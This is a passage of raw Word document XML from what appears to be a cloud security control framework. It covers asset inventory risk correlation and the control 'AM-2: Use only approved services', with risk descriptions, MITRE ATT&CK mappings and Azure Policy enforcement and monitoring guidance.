      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Vulnerability assessment integration: Automated vulnerability scanning for virtual machines using Qualys or Microsoft Defender Vulnerability Management with risk-based remediation prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70CD9D" w14:textId="43398433" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Compliance dashboard monitoring: Track regulatory compliance status for assets subject to PCI-DSS, HIPAA, ISO 27001, and other frameworks with gap analysis and remediation tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E92853" w14:textId="0CBBF127" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Configuration drift detection: Automated detection of security configuration changes and policy violations with alerts for unauthorized modifications or non-compliant configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447C5B86" w14:textId="2F4B192C" w:rsidR="009920C7" w:rsidRDefault="009920C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="159"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Threat intelligence and risk correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C999368" w14:textId="6569FD0F" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:lastRenderedPageBreak/>
        <w:t>Microsoft Threat Intelligence integration: Automatic correlation of asset inventory with Microsoft threat intelligence identifying resources potentially targeted by known threat actors or campaigns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438B54A" w14:textId="0ED4E36F" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Security alert aggregation: Centralized aggregation of security alerts from Defender for Cloud, Microsoft Sentinel, and Microsoft Defender XDR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009920C7">
        <w:t>mapped to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009920C7">
        <w:t xml:space="preserve"> specific assets for comprehensive risk visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F426E37" w14:textId="22C3F7CB" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Attack surface analysis: Continuous analysis of internet-facing assets, open ports, and network exposure with risk scoring based on vulnerability status and threat landscape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A42CC" w14:textId="1EAB8BFF" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="009920C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc242449515"/>
      <w:r w:rsidRPr="009920C7">
        <w:t>Service approval and application control</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="7E38E590" w14:textId="230383B2" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="009920C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc242449516"/>
      <w:r w:rsidRPr="009920C7">
        <w:t>AM-2: Use only approved services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="242A0577" w14:textId="60EA2862" w:rsidR="009920C7" w:rsidRDefault="009920C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE95EC7" w14:textId="52A1A1F8" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Enforce service approval processes restricting which cloud services users can provision through policy-based controls and monitoring. Ensure all deployed services undergo security review, compliance validation, and proper configuration hardening before production use, preventing shadow IT and unauthorized service sprawl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A9699" w14:textId="7A4D5950" w:rsidR="009920C7" w:rsidRDefault="009920C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009920C7">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3181E884" w14:textId="0AEA3D2F" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Shadow IT security gaps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649CF092" w14:textId="3D81542E" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Unapproved services bypass security review processes, operate without security monitoring, and lack proper configuration hardening creating exploitable vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0919F" w14:textId="5657B56B" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Compliance framework violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0DFF9" w14:textId="5D508F2A" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Unvetted services may not meet regulatory requirements for data protection, audit logging, or encryption leading to compliance failures and potential regulatory sanctions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAEB6B5" w14:textId="793DDBC5" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Increased attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5254498E" w14:textId="4EB7F053" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Each new service type expands attack surface with unique security configurations, APIs, and integration points that security teams lack expertise to properly secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603846E8" w14:textId="03251936" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Cost overruns and budget waste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B725D98" w14:textId="191CFC39" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Uncontrolled service provisioning leads to duplicate capabilities, unused resources, and unexpected charges undermining financial governance and budget predictability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F25ACB3" w14:textId="21499B93" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Operational complexity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42227A8D" w14:textId="1BC05696" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:lastRenderedPageBreak/>
        <w:t>Proliferation of service types increases operational complexity, training requirements, and support burden while fragmenting security monitoring and incident response capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C67120" w14:textId="0D3D2DD6" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Data governance failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD2977" w14:textId="51B07AC3" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="009920C7">
        <w:t>Unapproved storage services and databases bypass data classification policies, retention requirements, and encryption standards creating data protection gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE7605B" w14:textId="634128A1" w:rsidR="003F6581" w:rsidRDefault="003F6581">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003F6581">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D20B1" w14:textId="4D6CD4B9" w:rsidR="003F6581" w:rsidRDefault="003F6581" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="003F6581">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249491EC" w14:textId="7A81140C" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>valid accounts (T1078) using legitimate user credentials to provision unapproved services with security misconfigurations that attackers exploit for initial access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E1BCE" w14:textId="61873625" w:rsidR="003F6581" w:rsidRDefault="003F6581" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="003F6581">
        <w:t>Resource Development (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A884DA" w14:textId="2144EB3A" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>acquire infrastructure (T1583) provisioning unapproved cloud services to establish attack infrastructure, command-and-control capabilities, or malicious workloads bypassing security review processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91B2E2" w14:textId="14C9DBE3" w:rsidR="003F6581" w:rsidRDefault="003F6581" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="003F6581">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B2D5E" w14:textId="6499CC6D" w:rsidR="00F563AE" w:rsidRDefault="00F563AE" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00F563AE">
        <w:t>unused/unsupported cloud regions (T1535) deploying malicious infrastructure in unapproved cloud regions outside security monitoring coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05C615" w14:textId="77777777" w:rsidR="009920C7" w:rsidRDefault="009920C7" w:rsidP="009920C7"/>
    <w:p w14:paraId="20341A14" w14:textId="259E4305" w:rsidR="009920C7" w:rsidRPr="003F6581" w:rsidRDefault="003F6581" w:rsidP="003F6581">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F6581">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-2.1: Implement Azure Policy service restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F31A757" w14:textId="3C37B58B" w:rsidR="009920C7" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Control service provisioning through these enforcement mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675D40DF" w14:textId="64D0C512" w:rsidR="00997142" w:rsidRDefault="00997142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Service restriction policy framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620BEAB" w14:textId="132AFF9F" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve">Allowed resource </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00997142">
        <w:t>types</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve"> policy: Define comprehensive allowed resource </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00997142">
        <w:t>types</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve"> policy listing approved Azure services including virtual machines, storage accounts, databases, and platform services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F18D2" w14:textId="47881401" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve">Denied resource </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00997142">
        <w:t>types</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve"> policy: Explicit deny policies for services prohibited due to security concerns, compliance restrictions, or operational limitations with clear documentation of rationale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677806EF" w14:textId="77569D40" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Regional restriction policies: Restrict resource provisioning to approved Azure regions based on data residency requirements, compliance mandates, and operational support capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FB073C" w14:textId="2E53A1DB" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>SKU and tier restrictions: Limit resource SKUs and service tiers to approved configurations ensuring cost control and security feature availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C9B7B" w14:textId="07E4D3F1" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:lastRenderedPageBreak/>
        <w:t>Preview service controls: Restrict or prohibit preview and beta services in production environments while allowing controlled usage in development subscriptions for evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D375413" w14:textId="0842B3EB" w:rsidR="00997142" w:rsidRDefault="00997142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Policy scope and enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D785ECA" w14:textId="55274ED5" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Management group policy assignment: Apply service restriction policies at management group level for enterprise-wide enforcement with inheritance to all child subscriptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349587A9" w14:textId="6C3560B7" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Environment-based exemptions: Grant policy exemptions for development and sandbox subscriptions enabling innovation while maintaining production environment controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F74F48" w14:textId="14A8C09C" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Policy enforcement mode: Configure deny effect for production enforcement preventing non-compliant resource provisioning versus audit mode for visibility and compliance reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64249C48" w14:textId="696073BA" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Exception request workflow: Establish formal exception request process for legitimate business requirements with security review, time-limited approvals, and compensating controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47601B61" w14:textId="1844261A" w:rsidR="00997142" w:rsidRDefault="00997142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Azure Arc hybrid policy enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD439E" w14:textId="3EAC0847" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Policy extension to Arc-enabled servers: Apply Azure Policy guest configuration to Arc-enabled servers enforcing security baselines, software restrictions, and compliance requirements on hybrid infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC5684" w14:textId="49C3CB35" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve">Kubernetes policy enforcement: Deploy Azure Policy for Kubernetes on Arc-enabled Kubernetes clusters controlling pod security, image registries, and resource configurations across </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00997142">
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve"> environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A9DD42" w14:textId="4EA63D67" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve">Cross-cloud service approval: Use Azure Arc and Azure Policy to enforce approved service patterns on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00997142">
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve"> resources preventing unapproved AWS services or Google Cloud configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2471CEC8" w14:textId="58DDF78E" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="006D0A38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve">Hybrid compliance reporting: Unified policy compliance dashboard showing Azure-native, Arc-enabled servers, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00997142">
        <w:t>multicloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00997142">
        <w:t xml:space="preserve"> resources compliance status with approved service catalog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3C7AF" w14:textId="5C5CC991" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00997142">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>AM-2.2: Monitor and alert on unapproved service usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BC3F3" w14:textId="7BE2C821" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Detect and respond to unapproved services through these monitoring capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF0193" w14:textId="05F634BA" w:rsidR="00997142" w:rsidRDefault="00997142">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Unapproved service detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B44CD" w14:textId="526E97E8" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:t>Azure Activity Log monitoring: Monitor Azure Activity Log for resource creation events comparing against approved service catalog with real-time alerting on policy violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145249BD" w14:textId="04BE083D" w:rsidR="00997142" w:rsidRDefault="00997142" w:rsidP="00497029">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00997142">
        <w:lastRenderedPageBreak/>
        <w:t>Azure Policy compliance dashboard: Track policy compliance status across subscriptions identifying resources in non-compliant state requiring remediation or decommissioning.</w:t>
      </w:r>
    </w:p>
